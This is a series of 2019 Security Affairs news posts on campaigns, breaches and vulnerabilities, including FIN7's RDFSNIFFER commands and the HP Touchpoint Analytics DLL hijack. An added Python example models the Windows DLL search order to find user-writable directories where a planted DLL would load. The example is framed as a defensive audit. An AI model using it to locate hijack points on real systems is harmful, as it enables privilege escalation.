  • Impersonating social media websites, such as Facebook, Twitter and Instagram, as well as using these social media to spread malicious links. Experts have also observed a few social media entities that were used to contact victims in order to trick them into visiting malicious websites.
  • Sending SMS messages to the cellular phone of the victim. The messages include a link and claim to inform the recipient of an attempt to compromise their email account. The link points to a malicious phishing website.

Experts have identified more than eight new, previously unknown domains, all of which use the ‘.site’ TLD, that were involved in the attacks.

Other technical information, along with indicators of compromise (IoCs), is included in the report.

Pierluigi Paganini

(SecurityAffairs – Charming Kitten, Iran)

The post Charming Kitten Campaign involved new impersonation methods appeared first on Security Affairs.

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced that it has restored normal operations after paying the ransom requested by the crooks who infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted to pay the ransom and announced that it has restored normal operations.

The hospital chain hasn’t revealed the amount it paid to the crooks to decrypt the data; it seems that insurance covered the cost.

Recently I reported that several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure. At the time, a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, revealed that the infrastructures had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

The operations at the hospitals were severely impacted for 10 days during which the hospitals kept treating people, but new patients were sent to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The systems at the hospitals were infected with a variant of the Ryuk ransomware; internal staff reverted to using paper files.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, the Campbell County Memorial Hospital in Gillette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks; in August, at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either; LabCorp and Hancock Health are only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Alabama Hospital chain paid ransom to resume operations after ransomware attack appeared first on Security Affairs.

Security Affairs newsletter Round 235

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folks, let me inform you that I have suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Hacker is auctioning a database containing details of 92 million Brazilians
Iran-linked Phosphorus group hit a 2020 presidential campaign
UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities
D-Link router models affected by remote code execution issue that will not be fixed
Data from Sephora and StreetEasy data breaches added to HIBP
PoS malware infections impacted four restaurant chains in the U.S.
US will help Baltic states to secure baltic energy grid
Developer hacked back Muhstik ransomware crew and released keys
Experts found a link between a Magecart group and Cobalt Group
Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild
MS October 2019 Patch Tuesday updates address 59 flaws
Users reported problems with patches for CVE-2019-1367 IE zero-day
Hackers compromised Volusion infrastructure to siphon card details from thousands of sites
Multiple APT groups are exploiting VPN vulnerabilities, NSA warns
Researchers discovered a code execution flaw in NSA GHIDRA
Twitter inadvertently used Phone Numbers collected for security for Ads
vBulletin addresses three new high-severity vulnerabilities
Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware
Attor malware was developed by one of the most sophisticated espionage groups
iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware
Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012
SAP October 2019 Security Patch Day fixes 2 critical flaws
Tor Project is going to remove End-Of-Life relays from the network
Hacker breached escort forums in Italy and the Netherlands and is selling user data
Researchers released a free decryptor for the Nemty Ransomware
Sophos fixed a critical vulnerability in Cyberoam firewalls
Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics
Top cybersecurity certifications to consider for your IT career
FIN7 Hackers group is back with a new loader and a new RAT
Leafly Cannabis information platform suffered a data leak
SIM cards used in 29 countries are vulnerable to Simjacker attack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 235 appeared first on Security Affairs.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns

Confiant researchers have discovered a new Mac malware dubbed Tarmac distributed via malvertising campaigns in the US, Italy, and Japan.

Security experts at Confiant have discovered a new Mac malware dubbed Tarmac that is distributed via malvertising campaigns in the US, Italy, and Japan.

“Malicious ads redirect victims to sites showing popups peddling software updates, mainly Adobe Flash Player updates, that once executed will first install the OSX/Shlayer MacOS malware, which then executes the final payload, the OSX/Tarmac,” reads the analysis.

“Indeed, that’s not the official Adobe installer but a fake Flash Player installer that was signed using an Apple developer certificate 2L27TJZBZM issued probably to a fake identity named: Fajar Budiarto.”

Malware authors often sign their malware with Apple developer certificates because it is quite easy to do and allows their code to bypass security protections such as Gatekeeper and XProtect.

This malvertising campaign distributing the Shlayer and Tarmac malware began in January, but at the time experts did not spot the Tarmac malicious code.

Tarmac acts as a second-stage payload for the Shlayer infection. Experts pointed out that at the time of the analysis the command and control servers had been shut down and the samples they analyzed were relatively old. Experts believe the campaign is still ongoing and that the threat actors have likely changed their infrastructure.

Tarmac gathers information about the infected hardware and sends it to the C2 servers, then it waits for commands.

At the time of the analysis, it was not possible to understand which commands the malware supports because the C&C servers were down.

Experts noticed that most strings of the key components are protected with custom encryption and compression in an attempt to thwart analysis.

ZDNet reported that the malvertising campaign that distributed the Shlayer and Tarmac combo was targeted at users located in the US, Italy, and Japan.

The analysis published by the experts also includes additional technical details along with indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Tarmac, malvertising)

The post A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns appeared first on Security Affairs.

Leafly Cannabis information platform suffered a data leak

Leafly, a cannabis information platform, suffered a data leak that exposed the personal information of some of its customers.

Leafly, the world’s leading cannabis resource, informed its customers via email that it has suffered a data leak. On September 30, the company discovered that customer

The company discovered on September 30 that a secondary database was exposing customer information from July 2, 2016.

Exposed records include users’ email addresses, usernames and encrypted passwords; fortunately, the company does not collect financial data.

For some users, the database also leaked names, ages, gender, location, and mobile numbers.

“On September 30, we learned that a set of Leafly user records dated July 2, 2016 held in a secondary Leafly database was disclosed without permission. Your email address was in that file,” reads the notification email sent to the impacted customers. “Leafly does not collect credit card information or national identification numbers.”

The company hired a forensic security firm to support its staff in the investigation. The company recommends that users reset their password and use a unique password for each online service.

“However, it is a good idea to ensure that you use a unique password on Leafly and other services you use. If you share passwords across services and haven’t updated them recently, and you haven’t reset your Leafly password, we recommend you do so now,” continues the notification mail.

“Please accept our sincere apology for any concern this has caused. If you have any questions, please reach out to our customer support team at support@leafly.com,” states Leafly.

At this time, the number of impacted users is not clear.

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

The post Leafly Cannabis information platform suffered a data leak appeared first on Security Affairs.

FIN7 Hackers group is back with a new loader and a new RAT

FireEye Mandiant discovered that the FIN7 hacking group added new tools to its cyber arsenal, including a module that targets the remote administration software of an ATM vendor.

Security experts at FireEye Mandiant discovered that the FIN7 hacking group has added new tools to its arsenal, including a new loader and a module that hooks into the legitimate remote administration software used by the ATM maker NCR Corporation.

The group, active since late 2015, has targeted businesses worldwide to steal payment card information. FIN7 is suspected of having hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

In August 2018, three members of the notorious cybercrime gang were indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The new loader, dubbed BOOSTWRITE, drops malware directly in memory and allows the threat actors to load several malicious payloads, including the Carbanak backdoor.

Researchers also spotted a new RAT tracked as RDFSNIFFER that is dropped by the BOOSTWRITE loader.

“The first of FIN7’s new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER.” reads the Mandiant report. “While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.”

BOOSTWRITE uses the DLL search order hijacking technique to get its DLLs loaded into the target’s memory; once running, it downloads the initialization vector (IV) and the key needed to decrypt its two embedded payload DLLs.

After decrypting the embedded PE32 DLL payloads, the loader performs sanity checks on the results and then loads them into memory.

The researchers analyzed several samples of BOOSTWRITE; one of them, uploaded to VirusTotal on October 3, was signed with a MANGO ENTERPRISE LIMITED code signing certificate.

The loader was observed delivering the RDFSNIFFER DLL which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER hooks the process of NCR Corporation’s RDFClient; it runs every time the legitimate remote administration software is executed on the compromised machine.

The malicious code is designed to run man-in-the-middle attacks on connections made using RDFClient; it also allows attackers to upload, download, execute and/or delete arbitrary files.

Below is the list of supported commands:

Command Name    Legit Function in RDFClient    RDFClient Command ID    Description
Upload          MgrSendFile                    107                     Uploads a file to the remote system
Download        MgrGetFile                     108                     Retrieves a file from the remote system
Execute         RunCommand                     3001                    Executes a command on the remote system
DeleteRemote    MgrDeleteFile                  3019                    Deletes a file on the remote system
DeleteLocal     -                              -                       Deletes a local file

In March, the group carried out attacks delivering a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The messages sent to the victims were also dropping the backdoor DNSbot that primarily operates over DNS traffic.

In April 2018, FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

“While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements.” concludes the report.

“Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns.”

Pierluigi Paganini

(SecurityAffairs – FIN7, hacking)

The post FIN7 Hackers group is back with a new loader and a new RAT appeared first on Security Affairs.

SIM cards used in 29 countries are vulnerable to Simjacker attack

Security researchers at Adaptive Mobile who discovered the SimJacker issue have published the list of countries where mobile operators use flawed SIM cards.

Exactly one month ago, researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit, which is embedded in most SIM cards used by mobile operators in many countries. The experts discovered that exploitation of the vulnerability is independent of the model of phone used by the victim.

Now Adaptive Mobile has published the list of countries where local mobile operators use SIM cards affected by the Simjacker flaw, but the company did not name the impacted mobile carriers.

“This varies by country and region. From our analysis we could identify 61 Mobile Operators (excluding MVNOs) in the 29 countries that use this technology.” reads the report. “Based on public reported information the cumulative subscriber numbers of these S@T Browser-using Operators comes to ~861 million mobile connections (SIM cards).” “Not all SIM cards in the operator may use this technology. In discussions with a few operators in the LATAM region we were informed that the majority of SIM Cards (>90%) in their network had it.”

Below is the full list of countries published by the experts:

Central America:
Mexico
Guatemala
Belize
Dominican Republic
El Salvador
Honduras
Panama
Nicaragua
Costa Rica

South America:
Brazil
Peru
Colombia
Ecuador
Chile
Argentina
Uruguay
Paraguay

Africa:
Ivory Coast
Ghana
Benin
Nigeria
Cameroon

Europe:
Italy
Bulgaria
Cyprus

Asia:
Saudi Arabia
Iraq
Lebanon
Palestine

The S@T Browser application is installed on many SIM cards, including eSIMs, as part of the SIM Tool Kit (STK); it enables the SIM card to initiate actions that can be used for various value-added services.

S@T Browser implements a series of STK instructions (i.e. send, call, launch browser, provide local data, run command, and send data) that can be triggered by sending an SMS to the phone.

The Simjacker attack involves an SMS containing commands that instruct the SIM Card in the phone to ‘take over’ the phone.

The attacker could exploit the flaw to:

  • Retrieve the targeted device’s location and IMEI information,
  • Spread mis-information by sending fake messages on behalf of victims,
  • Perform premium-rate scams by dialing premium-rate numbers,
  • Spy on victims’ surroundings by instructing the device to call the attacker’s phone number,
  • Spread malware by forcing victim’s phone browser to open a malicious web page,
  • Perform denial of service attacks by disabling the SIM card, and
  • Retrieve other information like language, radio type, battery level, etc.

On October 3rd, the experts presented their research at the VB2019 conference in London and published a technical paper on the attack. The paper shows how the flaw is being exploited by threat actors and provides technical details on the technologies used in the attacks.

The experts explained that the attack is transparent to the users; the targets are not able to notice any anomaly.

Adaptive Mobile revealed that a private surveillance firm had been aware of the zero-day flaw for at least two years and has been actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

“Within the report we outline why we think it is a surveillance company that developed this exploit.” reads a FAQ page published by the experts. “However, we have not named the specific company that we believe is responsible, as to do so, we would need to release some additional proof. That proof would also reveal specific methods and information that would impact our ability to protect subscribers.”

Experts also added that the vulnerability has likely been exploited by nation-state actors for targeted attacks on persons of interest.

After the flaw was publicly disclosed, the researchers at SRLabs developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset. SRLabs researchers also updated their SIMTester app to include Simjacker.

Experts at Adaptive Mobile also analyzed the impact of the recently disclosed WIBattack and explained that it affects a smaller number of users than SimJacker. The experts estimated that only 8 operators in 7 countries are using SIM cards vulnerable to that attack.

“WIB is a proprietary SIM card technology like S@T which reports show could also be exploited via ‘Simjacker-like’ attacks. However, it’s important to state that we haven’t seen any attacks involving WIB.” concludes the report. “The WIB technology itself seems less prevalent than the S@T Browser (see diagram below and section 7 of the report), and publicly available information doesn’t indicate that WIB has the same apparent oversight in recommended security level.”

The following graph shows the number of Vulnerable Countries & Operators for S@T Browser and WIB.

“This has important implications for all Mobile Operators if they wish to deal with attacks from threat actors like this in the future.” concludes the report. “It means that previous ways of relying on recommendations, with no operational investigation or research won’t be enough to protect the mobile network and its subscribers, and what’s worse, will give a false sense of security.”

Pierluigi Paganini

(SecurityAffairs – SimJacker, hacking)

The post SIM cards used in 29 countries are vulnerable to Simjacker attack appeared first on Security Affairs.

Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics

SafeBreach experts discovered that the HP Touchpoint Analytics service is affected by a potentially serious vulnerability.

Security researchers at SafeBreach have discovered that the HP Touchpoint Analytics service is affected by a serious flaw tracked as CVE-2019-6333. The vulnerability received a CVSS score of 6.7 (medium severity).

TouchPoint Analytics is a service that allows the vendor to anonymously collect diagnostic data about hardware performance; it comes pre-installed on most HP PCs.

The service is based on the open-source tool Open Hardware Monitor and it is executed as “NT AUTHORITY\SYSTEM.”

The experts noticed that when the service starts, it attempts to load three DLL files that are missing. An attacker with administrative privileges on the targeted system can create malicious DLLs with the names of the missing files and place them in the locations where they are expected, so that they get executed when the HP service starts.

The experts pointed out that the Touchpoint Analytics service has high-permission-level access to the PC hardware, so a flaw affecting it could be exploited to escalate privileges to SYSTEM and bypass security features.

“The Open Hardware Monitor library provides a signed kernel driver named “WinRing0,” which is extracted and installed during runtime.” reads the analysis published by the experts.

“As you can see, the service was trying to load three missing DLL files, which eventually were loaded from the c:\python27 directory – our PATH environment variable:

  1. atiadlxx.dll
  2. atiadlxy.dll
  3. Nvapi64.dll

The researchers also published a PoC code to show how to use the Open Hardware Monitor library to read and write to physical memory.
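To make the search-order mechanism concrete, here is an added Python model (not HP’s, SafeBreach’s or Open Hardware Monitor’s code) of the default Windows DLL search order, used to audit which directories a SYSTEM service would probe for a DLL that is absent from its own directory and from the system directories. The application directory, the PATH, the files on disk and the set of directories assumed to be writable by other principals are all constructed for the demonstration; the DLL names are the three listed above, and the model ignores KnownDLLs and manifest redirection.

```python
"""Added example (not HP's, SafeBreach's or Open Hardware Monitor's code):
a simplified model of the default Windows DLL search order, used to find
where a service would pick up a DLL that is not where it expects it.
Every path below is constructed for the demonstration."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Constructed environment. In a real audit these come from the service's
# image path, the PATH it inherits and the directory ACLs on the host.
APP_DIR = r"C:\Program Files\HP\HP Touchpoint Analytics Client"   # constructed
SYSTEM_DIRS = (r"C:\Windows\System32", r"C:\Windows\System", r"C:\Windows")
CWD = r"C:\Windows\System32"          # services usually start here
PATH_DIRS = (r"C:\python27", r"C:\Windows\System32", r"C:\Tools")
FILES_ON_DISK: Set[str] = {           # lowercase full paths present on the host
    r"c:\windows\system32\kernel32.dll",
    r"c:\tools\atiadlxx.dll",
}
# Directories whose ACL lets a non-SYSTEM principal create files (assumption).
WRITABLE_BY_OTHERS: Set[str] = {r"c:\python27"}


@dataclass(frozen=True)
class Resolution:
    dll: str
    loaded_from: Optional[str]        # directory the loader settles on, or None
    candidates: Tuple[str, ...]       # directories probed, in order


def search_order(app_dir: str, system_dirs, cwd: str, path_dirs) -> List[str]:
    """Default (SafeDllSearchMode) order: application directory, System32,
    System, Windows, current directory, then PATH entries. KnownDLLs and
    manifest redirection are ignored in this model. Duplicates are dropped
    so each directory is probed once."""
    seen, ordered = set(), []
    for d in [app_dir, *system_dirs, cwd, *path_dirs]:
        key = d.lower().rstrip("\\")
        if key not in seen:
            seen.add(key)
            ordered.append(d)
    return ordered


def resolve_dll(dll: str, order: List[str], files_on_disk: Set[str]) -> Resolution:
    """Walk the order until a file with that name exists."""
    probed = []
    for d in order:
        probed.append(d)
        if (d.rstrip("\\") + "\\" + dll).lower() in files_on_disk:
            return Resolution(dll, d, tuple(probed))
    return Resolution(dll, None, tuple(probed))


def hijack_exposure(dll, order, files_on_disk, writable) -> List[str]:
    """Directories probed before the DLL is found (all of them if it is
    missing) that a less-privileged principal can write to: each one is a
    place where a planted file would be loaded by the service."""
    res = resolve_dll(dll, order, files_on_disk)
    before = res.candidates[:-1] if res.loaded_from else res.candidates
    return [d for d in before if d.lower().rstrip("\\") in writable]


def audit(dll_names) -> Dict[str, List[str]]:
    """Exposure per DLL name for the constructed environment above."""
    order = search_order(APP_DIR, SYSTEM_DIRS, CWD, PATH_DIRS)
    return {n: hijack_exposure(n, order, FILES_ON_DISK, WRITABLE_BY_OTHERS)
            for n in dll_names}


if __name__ == "__main__":
    for name, dirs in audit(["atiadlxx.dll", "atiadlxy.dll", "Nvapi64.dll",
                             "kernel32.dll"]).items():
        print(f"{name:14} exposure: {dirs or 'none'}")
```

In this constructed setup a DLL that exists nowhere (Nvapi64.dll) and one that exists only late in the order (atiadlxx.dll in C:\Tools) both expose the writable PATH entry, while kernel32.dll, found in System32 before any user-controlled directory, exposes nothing; the defensive fixes are the usual ones, shipping every DLL the service loads next to its binary and keeping user-writable directories out of the PATH that SYSTEM services inherit.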

The flaw could impact tens of millions of computers running the HP Touchpoint Analytics or Open Hardware Monitor.

“A potential security vulnerability has been identified with certain versions of HP Touchpoint Analytics prior to version 4.1.4.2827.” reads the security advisory published by HP. “This vulnerability may allow a local attacker with administrative privileges to execute arbitrary code via an HP Touchpoint Analytics system service.”

The experts reported the flaw to HP in early July and it was addressed this month with the release of version 4.1.4.2827.

Pierluigi Paganini

(SecurityAffairs – Touchpoint Analytics, hacking)

The post Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics appeared first on Security Affairs.

Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty Ransomware, security researchers have released a free decryptor tool that could be used to recover files.

In mid-August, the Nemty ransomware appeared in the threat landscape; its name comes from the extension it appends to the encrypted file names. The malicious code also deletes the shadow copies to make any recovery impossible.

Below is the ransom note dropped by the Nemty ransomware once the encryption process is completed. The attackers demand a 0.09981 BTC ransom (roughly $1,000), to be paid through a portal hosted on the Tor network.

Crooks used multiple attack vectors to distribute the ransomware; according to the popular malware researcher Vitali Kremez, it is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor tool that works on Nemty versions 1.4 and 1.6, and they have also announced a working tool for version 1.5.

The security firm is also working with Europol to get its decryptors included in the NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions, but the researchers are working to improve it and support other file types.

Tesorion does not let victims generate the decryption keys with the client; instead, the key is generated on its own servers and returned to the victim.

Victims can contact the Tesorion CSIRT and request help with the Nemty ransomware; the company will then send them a link to the decryptor that allows them to decrypt their files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims upload their files to the Tesorion servers, which use them to calculate the decryption key; the key is then sent back to the victims, who can load it into the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)

The post Researchers released a free decryptor for the Nemty Ransomware appeared first on Security Affairs.

Top cybersecurity certifications to consider for your IT career

With the right cybersecurity certifications, you can attain your goals seamlessly and in a fast way and speed up your career.

Cyber attacks are making headlines almost every day. The attacks have increased both in number and complexity. Because of this demand, it is now crucial for companies and specialized firms to invest in professionals to face a problem that technology alone can’t solve.

Whether you are a professional in the field, a curious person, or someone who wishes to work in the field, there are a lot of cybersecurity certifications you should consider in order to improve your skills. Earning a certification in this field is an excellent way to boost your career potential. With the right cybersecurity certifications, you can attain your goals seamlessly and quickly.

From my point of view, one of the ways you can grow your career is by investing your time and money in a certification that will truly improve your skills and knowledge and, thus, develop a new mindset to face everyday challenges.

There are exceptional cybersecurity certifications you should check out as they can be the golden ticket to your next job role.

Certified Ethical Hacker – CEH

A Certified Ethical Hacker is a skilled professional who understands and knows how to find weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker, but in a lawful and legitimate manner to assess the security posture of a target system(s). The CEH credential certifies individuals in the specific network security discipline of Ethical Hacking from a vendor-neutral perspective.


Certified Information Security Manager – CISM

ISACA®’s Certified Information Security Manager® (CISM®) certification instantly validates your skills and expertise in information security management. It proves you can plan and institute information security programs and practices that prevent security breaches and quickly mitigate damage should a breach occur. That’s why hiring managers and clients look for it and many businesses and government agencies require it.


CompTIA Security+

CompTIA Security+ is the first security certification IT professionals should earn. This certification establishes the core knowledge required by any cybersecurity role and provides a springboard to intermediate-level cybersecurity jobs. Security+ incorporates best practices in hands-on trouble-shooting to ensure security professionals have practical security problem-solving skills. Cybersecurity professionals with Security+ know how to address security incidents – not just identify them.


SANS GIAC Security Essentials – GSEC

The GIAC Security Essentials (GSEC) certification validates a practitioner’s knowledge of information security beyond simple terminology and concepts. GSEC certification holders are demonstrating that they are qualified for hands-on IT systems roles with respect to security tasks.


Offensive Security Certified Professional – OSCP

The OSCP examination consists of a virtual network containing targets of varying configurations and operating systems. At the start of the exam, the student receives the exam and connectivity instructions for an isolated exam network that they have no prior knowledge or exposure to. The successful examinee will demonstrate their ability to research the network (information gathering), identify any vulnerabilities and successfully execute attacks. This often includes modifying exploit code with the goal to compromise the systems and gain administrative access.

The candidate is expected to submit a comprehensive penetration test report, containing in-depth notes and screenshots detailing their findings. Points are awarded for each compromised host, based on their difficulty and level of access obtained.


Certified Cloud Security Professional – CCSP

Earning the globally recognized CCSP cloud security certification is a proven way to build your career and better secure critical assets in the cloud.

The CCSP shows you have the advanced technical skills and knowledge to design, manage and secure data, applications, and infrastructure in the cloud using best practices, policies and procedures established by the cybersecurity experts at (ISC)².

Certified Information Systems Security Professional – CISSP

The Certified Information Systems Security Professional (CISSP) certification is considered the gold standard in the field of information security. This CISSP certification training course is aligned with (ISC)² CBK 2018 requirements and will train you to become an information assurance professional who defines all aspects of IT security, including architecture, design, management, and controls. Most IT security positions require or prefer a CISSP certification, so get started with your CISSP training today.

Cybersecurity, like many other areas of IT, has grown to the point where certifications have been proliferating in recent years. As in other areas in IT, security is crucial and certifications can help you verify your high-end skill set.

About the Author

Pedro Tavares is a cybersecurity professional and a founding member and Pentester of CSIRT.UBI and the founder of seguranca-informatica.pt.

In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, hacking, cybersecurity, IoT and security in computer networks. He is also a freelance writer.

Pierluigi Paganini

(SecurityAffairs – cybersecurity certifications)

The post Top cybersecurity certifications to consider for your IT career appeared first on Security Affairs.

Hacker breached escort forums in Italy and the Netherlands and is selling user data

Popular prostitution and escort forums in Italy and the Netherlands have been hacked and data have been offered for sale in the cybercrime underground.

A Bulgarian hacker known as InstaKilla has breached two online escort forums and stole the user information that he is now offering for sale on a hacking forum.

The two escort forums are EscortForumIt.xxx and Hookers.nl, used by sex workers and their customers in Italy and the Netherlands; both websites have confirmed the breaches.

Experts report that Zooville, a forum for zoophilia and bestiality fans, was also hacked and its data offered for sale.

The Dutch news site NOS revealed that a hacker is selling the Dutch hookers.nl forum database for $300 on online forums. The exposed data includes user names, hashed passwords, and IP addresses for roughly 250,000 members.

“The account details of the 250,000 users of the Dutch website Hookers.nl have been leaked. This includes e-mail addresses. The website is popular among visitors to prostitutes and escorts, who exchange experiences and tips.” reported the NOS website.

“A hacker has captured the data from the members and offers it for sale, according to a study by the NOS after reporting an anonymous source.”

The hacker is also selling 33,000 records stolen from the Italian forum.

Both escort forums were running outdated versions of the popular vBulletin forum software. At the end of September, an anonymous hacker disclosed technical details and proof-of-concept exploit code for a critical zero-day remote code execution flaw in vBulletin (CVE-2019-16759). A few days later, the security expert Troy Mursch observed a botnet that was utilizing the recently disclosed vBulletin exploit to secure vulnerable servers so that they could not be compromised by other threat actors. The Bulgarian hacker likely exploited the same flaw to compromise the escort forums, which had not been updated by their admins.

“According to a sample of the data obtained by ZDNet, in the case of the Dutch forum, the hacker also appears to have gained access to the site’s internal paid subscription system, although there was no financial information included in the sample we received.” reported ZDNet.

InstaKilla is the same hacker who stole data from millions of Bulgarians in July and sent it to local media, the hacker is now offering for sale data from tens of other vBulletin-based forums.

Users of the escort forums are potentially exposed to extortion phishing campaigns similar to those that followed the Ashley Madison hack.

Pierluigi Paganini

(SecurityAffairs – escort forums, vBulletin)

The post Hacker breached escort forums in Italy and the Netherlands and is selling user data appeared first on Security Affairs.

Security Affairs 2019-10-11 00:14:11

A vulnerability in Sophos Cyberoam firewalls could be exploited by an attacker to gain access to a target’s internal network without authentication.

Sophos addressed a vulnerability in its Cyberoam firewalls that could be exploited by an attacker to gain access to a company’s internal network without providing a password.

“A critical shell injection vulnerability in Sophos Cyberoam Firewall appliances running CyberoamOS (CROS) version 10.6.6 MR-5 and earlier was recently discovered and responsibly disclosed to Sophos by an external security researcher.” reads the advisory published by Sophos.

“The vulnerability can be potentially exploited by sending a malicious request to either the Web Admin or SSL VPN consoles, which would enable an unauthenticated remote attacker to execute arbitrary commands.”

The flaw is a critical shell injection vulnerability that could allow a remote attacker to gain “root” permissions on vulnerable equipment; it can be exploited by sending malicious commands across the internet.

The vulnerability, tracked as CVE-2019-17059, was discovered by the security expert Rob Mardisalu, who reported it to Sophos. The expert also reported the issue to TechCrunch, which first reported the news.

“We’ve been working hard with internal and external security researchers to uncover serious remotely exploitable loopholes in SSL VPNs and Firewalls like Cyberoam, Fortigate and Cisco VPNs.” reads the security advisory published by the expert. “This Cyberoam exploit, dubbed CVE-2019-17059 is a critical vulnerability that lets attackers access your Cyberoam device without providing any username or password. On top of that, the access granted is the highest level (root), which essentially gives an attacker unlimited rights on your Cyberoam device.”

Cyberoam firewalls are used in large enterprises, they offer stateful and deep packet inspection for network, application and user identity-based security. Cyberoam Firewall protects organizations from DoS, DDoS and IP Spoofing attacks.

Mardisalu revealed that according to Shodan there are more than 96,000 internet-facing Cyberoam devices worldwide, most of them in enterprises, universities and banks.

The flaw is similar to the recently disclosed vulnerabilities in Palo Alto Networks, Pulse Secure and Fortinet VPN solutions.

“It’s a similar vulnerability to recently disclosed flaws in corporate VPN providers, notably Palo Alto Networks, Pulse Secure and Fortinet, which allowed attackers to gain access to a corporate network without needing a user’s password.” reported TechCrunch. “Many large tech companies, including Twitter and Uber, were affected by the vulnerable technology, prompting Homeland Security to issue an advisory to warn of the risks.”

The flaw affects Cyberoam Firewalls running CROS 10.6.6 MR-5 and earlier; Sophos plans to include a fix in the next update of its CyberoamOS operating system.

“There are a small amount of devices that have not as of yet been patched because the customer has turned off auto-update and/or are not internet-facing devices.” said a Sophos spokesperson.

The researcher will release the proof-of-concept code in the coming months.

Pierluigi Paganini

(SecurityAffairs – Cyberoam firewalls, hacking)

The post appeared first on Security Affairs.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind the BitPaymer and iEncrypt ransomware attacks has been found exploiting a Windows zero-day in Apple iTunes and iCloud.

The cybercriminals behind BitPaymer and iEncrypt ransomware attacks have been found exploiting a Windows zero-day vulnerability for Apple iTunes and iCloud in attacks in the wild.

The zero-day vulnerability resides in the Bonjour updater that comes packaged with Apple’s iTunes and iCloud software for Windows, and it was abused to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

